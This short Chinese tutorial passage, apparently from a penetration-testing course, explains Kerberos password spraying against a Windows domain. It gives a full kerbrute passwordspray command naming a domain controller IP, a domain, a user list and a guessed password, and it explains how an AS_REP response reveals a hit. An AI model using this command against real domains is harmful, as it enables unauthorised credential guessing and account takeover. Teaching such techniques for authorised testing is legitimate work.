前言
所谓密码喷洒其实就是使用一个密码跟多个用户名进行比对,其实就相当于一对多的概念。
我们前面说到过,用户名存在或不存在的时候报错是不一样的,那么密码正确和不正确的情况
下,报错也是不一样的。所以我们可以进行域内用户的密码喷洒。
使用kerbrute工具进行密码喷洒。
♾️ text 代码:./kerbrute_linux_amd64 passwordspray --dc 10.10.211.25 -d yunmengsec.com
user.txt Admin123..
Wireshark语句:“kerberos”
♾️ text 代码:成功就会得到了AS_REP响应,而其他并没有得到。